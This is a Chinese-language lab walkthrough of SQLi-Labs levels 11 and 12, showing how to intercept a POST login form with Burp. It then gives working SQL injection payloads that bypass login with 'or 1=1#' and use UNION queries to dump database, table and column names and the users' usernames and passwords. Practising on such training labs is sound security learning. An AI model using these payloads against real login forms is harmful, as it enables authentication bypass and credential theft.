标签:12 uname passwd #& submit Labs Sqli Submit select
less-11
11关以后已经和前几关不同。页面由get方式变成了类似form表单的post方式的登陆界面,我们不能直接看到数据,所以要用到burp抓包.
抓包方式前面已经说过,这里直接使用,我们先输入admin看看:
我们通过上面的数据包可以看到最后一行是post的数据,所以可以在hackbar的post data进行注入:
注意:注释符不能再用--+或者--空格,只能用#,因为前者是在url中使用的
uname=admin' or 1=1# &passwd=admin&submit=Submit
uname=admin' &passwd=admin&submit=Submit
通过上图我们可以明确存在注入漏洞,然后步骤和前面基本一致:
我们假设不知道正确的用户名和密码,查列:uname=a&passwd=a' order by 3#&submit=Submit
uname=a&passwd=a' order by 2#&submit=Submit
uname=a&passwd=a' union select 1,2 #&submit=Submit
由以上可知,数据表中有两个字段,然后按照以前的步骤:
爆库:uname=a&passwd=a' union select 1,(select group_concat(schema_name)from information_schema.schemata) #&submit=Submit
查看当前数据库:uname=a&passwd=a' union select 1,database() #&submit=Submit
爆表:uname=a&passwd=a' union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479) #&submit=Submit
获取users表中的字段内容:uname=a&passwd=a' union select 1,(select group_concat(column_name)from information_schema.columns where table_name=0x7573657273) #&submit=Submit
获取users表中的用户名和密码:uname=a&passwd=a' union select 1,(select group_concat(concat_ws('-',username,password))from security.users) #&submit=Submit
less-12
第12关与11关基本完全一致,只有数据包裹的格式不同,变成了(“a”),其他步骤完全一样,所以这里放一下最后的结果语句:
uname=a&passwd=a") union select 1,(select group_concat(concat_ws(0x2d,username,password))from security.users) #&submit=Submit
0x2d代表-
标签:12,uname,passwd,#&,submit,Labs,Sqli,Submit,select 来源: https://www.cnblogs.com/hzk001/p/12219153.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。